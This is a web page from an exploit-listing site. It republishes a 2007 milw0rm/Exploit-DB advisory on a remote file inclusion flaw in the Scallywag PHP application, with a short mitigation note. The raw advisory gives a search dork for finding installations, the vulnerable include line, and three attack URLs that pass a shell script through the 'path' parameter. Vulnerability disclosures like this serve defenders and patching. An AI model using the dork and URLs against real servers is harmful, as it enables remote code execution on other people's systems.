header-logo
Suggest Exploit
vendor:
Scallywag
by:
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Scallywag
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Scallywag Remote File Inclusion Vulnerability

The Scallywag application is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a remote file using a specially crafted parameter in the URL. This allows the attacker to execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, the application should validate and sanitize user input before including files. Additionally, access controls should be implemented to restrict access to sensitive files.
Source

Exploit-DB raw data:

##############################################################################################
#Scallywag  <=  Remote File Inclusion Vulnerability                                          #
#                                                                                            # 
#Dork:"Powered by Scallywag"                                                                 #
#                                                                                            #
#                                                                                            # 
##############################################################################################
#Vuln Code                                                                                   #  
#                                                                                            # 
#ERROR1:skin/dark/template.php                                                               # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              # 
#                                                                                            # 
#                                                                                            # 
#BUG1:                                                                                       # 
#                                                                                            # 
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]]                #
############################################################################################## 
#                                                                                            # 
#ERROR2:skin/gold/template.php                                                               # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              # 
#                                                                                            # 
#                                                                                            # 
#BUG2:                                                                                       # 
#                                                                                            # 
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]]                #
##############################################################################################
#                                                                                            # 
#ERROR3:skin/original/template.php                                                           # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              #
#                                                                                            # 
#                                                                                            # 
#BUG3:                                                                                       # 
#                                                                                            # 
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]]           #
##############################################################################################
#                                                                                            # 
#Script Download                                                                             # 
##############################################################################################
#                                                                                            # 
#http://www.woweb.ru/load/82-1-0-3791                                                        # 
#                                                                                            # 
############################################################################################## 
#                                                                                            # 
#Cyber-Security                                                                              # 
#                                                                                            # 
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-23]

Navigation

Suggest Exploit

Services By CQR